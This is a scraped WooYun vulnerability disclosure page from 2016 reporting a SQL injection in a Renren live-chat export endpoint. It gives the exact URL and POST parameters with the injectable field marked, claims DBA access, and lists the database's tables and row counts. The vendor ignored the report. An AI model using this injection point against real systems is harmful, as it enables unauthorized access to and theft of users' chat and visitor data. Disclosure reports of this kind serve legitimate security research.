人人网某处SQL注入影响大量数据 | wooyun-2016-0222273| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0222273

漏洞标题：人人网某处SQL注入影响大量数据

漏洞作者：路人甲

提交时间：2016-06-23 12:21

修复时间：2016-06-24 12:19

公开时间：2016-06-24 12:19

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-06-23：细节已通知厂商并且等待厂商处理中
2016-06-24：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)
export=txt&companyId=1&subStrSql=*

dba权限

Database: live800_im
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| visitor_access      | 15081675 |
| operator_status     | 633129  |
| chat_topic          | 616252  |
| live800_system      | 410676  |
| chat_content        | 289363  |
| chat_sta            | 289308  |
| chat_info           | 285963  |
| leaveword_topic     | 161506  |
| trustful_visitor    | 78942   |
| leaveword           | 74624   |
| contact             | 71702   |
| cookie_contact      | 71702   |
| company_config_data | 69254   |
| lost                | 51034   |
| sync_info           | 23170   |
| op_chat_content     | 7200    |
| daily_flow_capacity | 1329    |
| sys_operate_log     | 1266    |
| faq                 | 115     |
| operator            | 82      |
| privilege           | 82      |
| company_config      | 36      |
| user_defined_button | 18      |
| company_ui_config   | 16      |
| config_template     | 12      |
| user_invite         | 12      |
| company_skill       | 11      |
| ad_column           | 10      |
| routing_action      | 6       |
| chat_config         | 4       |
| leaveword_box       | 3       |
| notify              | 3       |
| routing_condition   | 3       |
| routing_policy      | 3       |
| routing_rule        | 3       |
| canned_url          | 1       |
| company             | 1       |
| company_style       | 1       |
| customization       | 1       |
| fuf                 | 1       |
| ip_prohibit         | 1       |
| operator_account    | 1       |
+---------------------+---------+

漏洞证明：

修复方案：

改改改

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-06-24 12:19

厂商回复：

忽略

漏洞评价：

评价

2016-06-23 13:45 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

又有新裤子出来了。。
2016-06-23 16:26 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

......跟我的重复了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0222273

漏洞标题：人人网某处SQL注入影响大量数据

相关厂商：人人网

漏洞作者：路人甲

提交时间：2016-06-23 12:21

修复时间：2016-06-24 12:19

公开时间：2016-06-24 12:19

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0222273

漏洞标题：人人网某处SQL注入影响大量数据

相关厂商：人人网

漏洞作者： 路人甲

提交时间：2016-06-23 12:21

修复时间：2016-06-24 12:19

公开时间：2016-06-24 12:19

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0222273"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云